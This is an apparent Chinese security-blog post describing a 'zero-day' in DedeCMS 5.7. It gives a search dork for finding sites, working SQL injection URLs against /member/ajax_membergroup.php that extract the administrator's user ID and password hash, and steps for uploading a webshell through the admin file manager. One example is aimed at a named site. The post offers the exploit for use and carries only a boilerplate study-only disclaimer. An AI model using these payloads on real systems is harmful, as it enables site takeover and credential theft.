织梦cms5.7版本通杀0day漏洞

织网5.7的漏洞,可任意上传~

搜索关键词:Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc

访问/data/admin/ver.txt来查看cms

然后访问/member/ajax_membergroup.php?action=post&membergroup=1,出现"朋友 修改"即可注入

通过注入得到管理员帐号密码,搜后台,上传大马OK~提权还在学习阶段~

查看网站的版本

code 区域cms /data/admin/ver.txt 

查看是否有"朋友 修改",有则存在注入

 

code 区域/member/ajax_membergroup.php?action=post&membergroup=1 

帐号

code 区域http://www.dzdyk.com /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 

去掉前三位和最后一位,得到管理员密码

code 区域/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 

扫后台,登录成功

后台页面

模块-文件管理器-文件上传 上传大马

 

登录webshell

更多相关文章阅读:

版权保护: 本文由蓝域安全网所发布,转载请保留本文链接: http://www.yemogege.cn/wzaq-stwz/546.html

免责声明:蓝域安全网所发布的一切渗透技术视频文章,逆向脱壳病毒分析教程,以及相关实用源码仅限用于学习和研究目的
请勿用于商业用途。如有侵权、不妥之处,请联系站长并出示版权证明以便删除! 

侵权删帖/违法举报/投稿等事物联系邮箱:yemogege@vip.qq.com 网站地图